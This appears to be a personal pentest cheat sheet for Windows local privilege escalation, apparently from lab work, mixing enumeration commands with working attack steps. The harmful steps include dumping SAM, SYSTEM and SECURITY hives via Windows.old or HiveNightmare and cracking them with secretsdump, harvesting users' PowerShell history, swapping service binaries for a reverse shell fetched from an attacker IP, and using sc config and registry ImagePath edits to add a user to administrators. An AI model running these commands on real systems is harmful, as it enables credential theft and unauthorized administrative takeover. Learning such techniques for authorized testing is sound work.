Systeminfo#

  • Under Hotfix(s), google those KB to see when the system was patched
  • OS Version, System Boot Time can also be a good indication
  • Under Network Card(s) are all the NICs connected. But generally in enterprise env, they use vlan and firewall rule instead of a physical cable
systeminfo

If Hotfix(s) isn’t showing anything, maybe because non-admin user is not allowed to see, then we can do this

wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe list brief

And this

Get-HotFix | ft -AutoSize

Or this

[System.Environment]::OSVersion.Version
Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'

Here is where you can search up build, version, etc…

Wikipedia, CVEDetails

Get-WmiObject -Class Win32_OperatingSystem | select Description

Domain, users, groups, policies#

Domain#

Print domain name, and domain controller

echo %USERDOMAIN%
echo %logonserver%

Find domain controllers

dsquery * -filter "(userAccountControl:1.2.840.113556.1.4.803:=8192)" -limit 5 -attr sAMAccountName

Users#

Current user privilege. see this

whoami /priv

Current user’s groups

whoami /groups

All local users

net user

All local users, with description

Get-LocalUser

Groups#

All local groups

net localgroup

Group info

net localgroup administrators

Password Policy#

net accounts

User Interaction#

See more at 06. Privilege Escalation/Windows/User Interactions

Check if any one else is logged in

qwinsta
query user

AlwaysInstallElevated#

Check permission

# should return 0x1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Unattend#

type C:\Panther\Unattend.xml

SAM#

Windows.old#

No need for permissions

dir C:\Windows.old\

If the directory exists, go to this location, then transfer SAM, SYSTEM, SECURITY back to our machine

cd C:\Windows.old\Windows\system32\config\

Transfer those back to our machine and extract hash

impacket-secretsdump -sam sam -system system -security security local

Weak permission#

If we have (RX) permission, we good.

icacls c:\Windows\System32\config\SAM
icacls c:\Windows\System32\config\SYSTEM
icacls c:\Windows\System32\config\SECURITY

Github Page

Download then transfer the binary to target machine

wget https://github.com/GossiTheDog/HiveNightmare/releases/download/0.6/HiveNightmare.exe

Then run on target machine

.\HiveNightmare.exe

Powershell history#

(Get-PSReadlineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Installed software#

Always uses this first. Painful lesson learned. The others commands might miss some.

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation

$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Is FileZilla, Putty installed? Run LaZagne

wmic product get name
Get-WmiObject -Class Win32_Product |  select Name, Version

Environment variable#

Look out for PATH and HOMEDRIVE:

  • If PATH is modified, and we can write to a path, we can do some DLL injection
  • If HOMEDRIVE is a shared (network) drive, we can put malware in USERPROFILE\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
set
Get-ChildItem Env: | ft key,value

Autorun#

Any start up programs?

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl

Check our permission over that binary, if can write then replace with a revshell binary, then wait until that user logs in

Scheduled tasks#

schtasks /query /fo LIST /v
Get-ScheduledTask | select TaskName,State

COM Objects#

IDK wtf am I writing right now, check this out later and write it more properly

reg query HKCR\CLSID /s
get-acl "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" | fl

Services#

Listening ports (this command also returns pid of process that opened the port)

netstat -ano

All services

tasklist /svc

Filter service with pid

tasklist /svc /FI "PID eq 2188"

SharpUp#

Github Page

Compiled binary

Download and transfer the binary to target machine

wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/refs/heads/master/SharpUp.exe

Run

.\SharpUp.exe audit

After running this, you will get lists of vulnerable services, note down the PATHNAME.

Modifiable Service Binaries#

PATHNAME: "C:\Program Files (x86)\PCProtect\SecurityService.exe"

See our permission over that executable binary

icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Then replace it with a reverse shell binary

wget http://10.10.14.45/revshell.exe -o "C:\Program Files (x86)\PCProtect\SecurityService.exe"

Modifiable Services#

Name: WindscribeService

Download, unzip and transfer AccessChk from sysinternals suite

wget https://download.sysinternals.com/files/AccessChk.zip
unzip ./AccessChk.zip

Check service permission

accesschk.exe /accepteula -quvcw WindscribeService

Exploit

sc config WindscribeService binpath="cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService

Unquoted service path#

Search

wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

The binary path should look like this, unquoted

C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

If path is unquoted, windows will attempt to load these binary, in order:

  • C:\Program.exe
  • C:\Program Files.exe
  • C:\Program Files (x86)\System.exe
  • C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe

So we can just place a revshell binary at those locations, if we have permission to write there, and also wait for the service to restart.

Oftentimes, this vulnerability is not exploitable because of that.

Weak registry permission#

Download, unzip and transfer AccessChk from sysinternals suite

wget https://download.sysinternals.com/files/AccessChk.zip
unzip ./AccessChk.zip

Checking for Weak Service ACLs in Registry

accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services

If we have RW on a registry, we good. We change the binary path to our command

Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "cmd.exe /c net localgroup administrators htb-student /add"

Named pipes#

Listing pipes#

Download sysinternal pipelist, unzip and transfer to target machine

wget https://download.sysinternals.com/files/PipeList.zip
unzip PipeList.zip

Then we can begin enumeration

pipelist.exe /accepteula

Or we can use powershell Get-ChildItem cmdlet and don’t have to download anything

gci \\.\pipe\

View pipe permissions#

Download sysinternal AccessChk, unzip and transfer to target machine

wget https://download.sysinternals.com/files/AccessChk.zip
unzip AccessChk.zip

Then we can view permission of a pipe we are interested in

accesschk.exe /accepteula \\.\Pipe\lsass -v

Use this Metasploit module if there is WindscribeService pipe, and we can read and write

Misc#

# Get PS module currently loaded
Get-Module
# Execution policies
Get-ExecutionPolicy -List
Backward Dpapi Print Nightmare Forward